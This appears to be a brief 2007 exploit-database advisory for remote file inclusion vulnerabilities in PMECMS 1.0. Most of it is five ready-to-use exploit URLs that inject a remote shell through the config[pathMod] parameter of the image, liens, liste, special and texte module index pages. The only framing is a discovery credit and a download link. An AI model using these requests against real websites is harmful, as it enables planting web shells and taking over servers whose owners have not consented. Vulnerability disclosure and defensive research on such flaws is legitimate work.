id: 1830
date: 05/03/2007
title: PMECMS <= 1.0 config[pathMod] Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

===================================================================
PMECMS <= 1.0 config[pathMod] Remote File Inclusion Vulnerabilities
===================================================================



# PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.pmecms.com/export/maj/PMECMS_Standard_os1.0.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/mod/image/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liens/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liste/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/special/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/texte/index.php?config[pathMod]=Shell
# And More Download Script ......!!!



#  0day.today [2023-03-24]  #